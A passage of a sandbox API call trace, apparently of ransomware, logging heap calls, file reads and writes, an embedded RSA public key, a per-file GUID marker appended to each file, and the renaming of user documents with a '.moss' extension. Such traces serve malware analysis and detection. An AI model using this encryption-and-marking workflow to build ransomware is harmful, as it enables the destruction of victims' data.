Flags=0x0, Size=0x4) returned 0x35fd280 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc068 [0169.816] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.816] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.817] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc98, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.817] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.817] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.817] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.817] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.817] CloseHandle (hObject=0x664) returned 1 [0169.819] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qG9cSLbVolqRPaJs1.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qg9cslbvolqrpajs1.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qG9cSLbVolqRPaJs1.ppt.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qg9cslbvolqrpajs1.ppt.moss")) returned 1 [0169.820] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0169.820] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.820] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.821] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.821] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd0c03c0, ftCreationTime.dwHighDateTime=0x1d57a90, ftLastAccessTime.dwLowDateTime=0x2659e0d0, ftLastAccessTime.dwHighDateTime=0x1d5ab9c, ftLastWriteTime.dwLowDateTime=0x2659e0d0, ftLastWriteTime.dwHighDateTime=0x1d5ab9c, nFileSizeHigh=0x0, nFileSizeLow=0x7cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qwrHEdKn1oomXnqN_.xlsx", cAlternateFileName="QWRHED~1.XLS")) returned 1 [0169.821] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qwrHEdKn1oomXnqN_.xlsx") returned=".xlsx" [0169.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qwrHEdKn1oomXnqN_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qwrhedkn1oomxnqn_.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.822] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=1996) returned 1 [0169.822] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.825] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.826] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.827] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x7cc, lpOverlapped=0x0) returned 1 [0169.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.827] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.829] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.829] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.829] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.829] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.829] GetLastError () returned 0x0 [0169.829] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.829] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.829] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.829] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.829] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.829] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.829] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.829] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.829] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d0) returned 0x3b48820 [0169.829] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.830] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45b78 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc038 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45bc0 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc050 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc080 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc098 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.830] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b4b098 [0169.830] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc080 | out: hHeap=0xcd0000) returned 1 [0169.830] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc098 | out: hHeap=0xcd0000) returned 1 [0169.830] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.830] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.830] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc098 [0169.830] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc080 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc098 | out: hHeap=0xcd0000) returned 1 [0169.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc080 | out: hHeap=0xcd0000) returned 1 [0169.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.831] GetCurrentThreadId () returned 0x324 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b49380 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.832] GetCurrentThreadId () returned 0x324 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362c768 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc080 [0169.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0169.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc098 [0169.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc068 [0169.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0169.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc0b0 [0169.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0169.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.834] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.834] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.834] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.834] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.834] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.834] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.834] CloseHandle (hObject=0x664) returned 1 [0169.835] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.836] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b4b098 [0169.836] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qwrHEdKn1oomXnqN_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qwrhedkn1oomxnqn_.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qwrHEdKn1oomXnqN_.xlsx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qwrhedkn1oomxnqn_.xlsx.moss")) returned 1 [0169.838] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fccbbc0, ftCreationTime.dwHighDateTime=0x1d5dc16, ftLastAccessTime.dwLowDateTime=0xcb6300f0, ftLastAccessTime.dwHighDateTime=0x1d5e582, ftLastWriteTime.dwLowDateTime=0xcb6300f0, ftLastWriteTime.dwHighDateTime=0x1d5e582, nFileSizeHigh=0x0, nFileSizeLow=0x2174, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RvABmrzNFr7uffIvxM.csv", cAlternateFileName="RVABMR~1.CSV")) returned 1 [0169.838] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.838] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.838] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RvABmrzNFr7uffIvxM.csv") returned=".csv" [0169.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RvABmrzNFr7uffIvxM.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rvabmrznfr7uffivxm.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.838] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=8564) returned 1 [0169.838] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.842] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x214e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.842] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.843] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.843] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x2174, lpOverlapped=0x0) returned 1 [0169.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.843] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.843] lstrlenA (lpString="-----BEGIN PUBLIC 